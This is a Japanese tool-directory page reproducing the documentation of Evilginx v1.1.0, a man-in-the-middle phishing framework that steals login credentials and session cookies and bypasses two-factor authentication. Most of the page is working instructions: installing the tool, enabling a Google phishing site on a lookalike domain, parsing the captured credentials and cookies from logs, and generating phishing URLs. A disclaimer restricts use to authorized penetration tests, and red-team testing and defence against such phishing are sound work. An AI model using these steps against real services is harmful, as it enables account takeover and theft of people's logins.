Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
evilginx — 新しいバージョンを使用してください: https://github.com/kgretzky/evilginx2 | Kitploit
ツール/GitHubGitHub/kgretzky/evilginx
フィッシングツールウェブアプリケーション悪用フィッシングペネトレーションテストソーシャルエンジニアリング認証レッドチーミング
GitHubkgretzky/evilginx

evilginx

新しいバージョンを使用してください: https://github.com/kgretzky/evilginx2

リポジトリを見る
1.2k2818年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Evilginx v.1.1.0

Evilginx

このバージョンは廃止されました。最新バージョンを使用してください!

EVILGINX 2: https://github.com/kgretzky/evilginx2

Evilginxは、あらゆるウェブサービスの認証情報やセッションCookieをフィッシングするために使用される中間者攻撃フレームワークです。そのコアはNginx HTTPサーバー上で動作し、proxy_passとsub_filterを利用してHTTPコンテンツをプロキシし変更しながら、クライアントとサーバー間のトラフィックを傍受します。

仕組みやインストール方法については、私のブログで学べます:

最初の記事はやや古くなっています:Evilginx - Advanced Phishing With Two-factor Authentication Bypass

Evilginx 1.0 アップデート - 2FAフィッシングでスキルアップ: Evilginx 1.0 Update - Up Your Game in 2FA Phishing

Evilginx 1.1 アップデート: Evilginx 1.1 Update

免責事項

Evilginxは非常に悪質な目的に使用される可能性があることを認識しています。この作品は、熟練した攻撃者が何ができるかを示す単なるデモンストレーションです。防御側は、防御を構築する際にこのような攻撃を考慮し、このフィッシング手法から保護する方法を見つける責任があります。 Evilginxは、フィッシングされる側からの書面による許可を得た、正当なペネトレーションテストの任務でのみ使用されるべきです。

貢献者の殿堂

@poweroftrue

インストール

Evilginxには、Debian wheezy/jessieマシンにパッケージ全体を簡単にインストールするためのインストールスクリプトinstall.shが用意されています。

root@kitploit:~
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh

使い方

root@kitploit:~
            _ _       _           
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/          v1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...

positional arguments:
  {setup,parse,genurl}
    setup               Evilginxを設定します。
    parse               ログファイルを解析します。
    genurl              フィッシングURLを生成します。

optional arguments:
  -h, --help            このヘルプメッセージを表示して終了します
セットアップ

Nginxサーバーで使用するサイト設定を、sitesディレクトリにあるEvilginxテンプレートを使用して有効化または無効化します。

root@kitploit:~
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            このヘルプメッセージを表示して終了します
  -d DOMAIN, --domain DOMAIN
                        あなたのフィッシングドメイン。
  -y                    すべての質問に'Yes'で答える。
  -l, --list            利用可能なサポートアプリを一覧表示する。
  --enable ENABLE       指定した名前のサイトを有効化する。
  --disable DISABLE     指定した名前のサイトを無効化する。

利用可能なサイト設定テンプレートを一覧表示:

root@kitploit:~
python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

事前に登録したフィッシングドメインnot-really-google.comでgoogleフィッシングサイトを有効化する:

root@kitploit:~
python evilginx.py setup --enable google -d not-really-google.com

facebookフィッシングサイトを無効化する:

root@kitploit:~
python evilginx.py setup --disable facebook
パース

Nginxログを解析して、傍受したログイン認証情報とセッションCookieを抽出します。ログはデフォルトでは、evilginx.pyスクリプトがあるlogsディレクトリに保存されます。 これは、セットアップフェーズで自動解析を有効にすると自動的に行えます。

root@kitploit:~
usage: evilginx.py parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            このヘルプメッセージを表示して終了します
  -s SITE, --site SITE  ログを解析するサイトの名前('all'ですべてのサイトのログを解析)。
  --debug               解析後にログファイルを切り詰めない。

googleサイトのみログを解析:

root@kitploit:~
python evilginx.py parse -s google

利用可能なすべてのサイトのログを解析:

root@kitploit:~
python evilginx.py parse -s all
URLの生成

レッドチームアセスメントで使用できるフィッシングURLを生成します。

root@kitploit:~
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            このヘルプメッセージを表示して終了します
  -s SITE, --site SITE  リンクを生成するサイトの名前。
  -r REDIRECT, --redirect REDIRECT
                        サインイン成功後にユーザーをこのURLにリダイレクトします。

ログイン成功時に被害者をリックロール動画にリダイレクトするgoogleフィッシングURLを生成:

root@kitploit:~
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
ツールをダウンロード